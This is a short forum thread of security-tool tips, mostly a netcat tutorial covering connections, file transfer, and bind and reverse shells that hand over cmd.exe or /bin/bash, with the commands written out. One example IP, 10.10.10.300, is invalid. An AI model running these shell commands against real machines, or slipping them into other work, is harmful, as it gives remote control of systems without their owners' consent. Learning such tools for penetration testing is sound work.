Hacker Tools

QUE.com Forums 30 – Cyber Security Hacker Tools

Viewing 3 posts - 1 through 3 (of 3 total)
  • Author
    Posts
  • #39274
    Support @QUE.COM
    Keymaster

    Over the years I’ve used many different tools. Some I still use today.

    Nmap is always handy for port scanning.
    KALI is pentest best friend tool.

    More tools I listed them at https://Hackercon.com web page.

    #51477
    Support @QUE.COM
    Keymaster

    Using NETCAT

    Connect to network.
    workstation 1 (IP: 10.10.10.200)
    $ nc -nvlp 8888

    workstation 2
    $ nc -nv 10.10.10.200 8888

    Transferring files using netcat.
    workstation 1 (IP: 10.10.10.200)
    $ nc -nvlp 8888 > incoming.exe

    workstation 2
    Use wget as example.
    $ locate wget // to find the path
    $ nc -nv 10.10.10.200 8888 < /path/wget.exe To check it, go to workstation and run incoming.exe $ incoming.exe -V //to check the version of the program, it should say WGET. You can rename it back to avoid confusion. Done.

    #51478
    Support @QUE.COM
    Keymaster

    Netcat Remote Administration.

    Netcat BIND Shell scenario.
    From workstation 1 (IP: 10.10.10.300), a windows os.
    c:\ nc -nvlp 5555 -e cmd.exe

    From workstation 2, a linux os.
    $ nc -nv 10.10.10.300 5555

    Then, workstation 2 have access to the cmd.exe of workstation 1.

    Netcat REVERSE Shell scenario.
    From workstation 1 (IP: 10.10.10.300), a windows os.
    c:\ nc -nvlp 5555

    From workstation 2, a linux os.
    $ nc -nv 10.10.10.300 5555 -e /bin/bash

    Once connected, the workstation 1 will have access to the linux shell prompt.
    Done.

Viewing 3 posts - 1 through 3 (of 3 total)
  • You must be logged in to reply to this topic.
AI Chatbot Avatar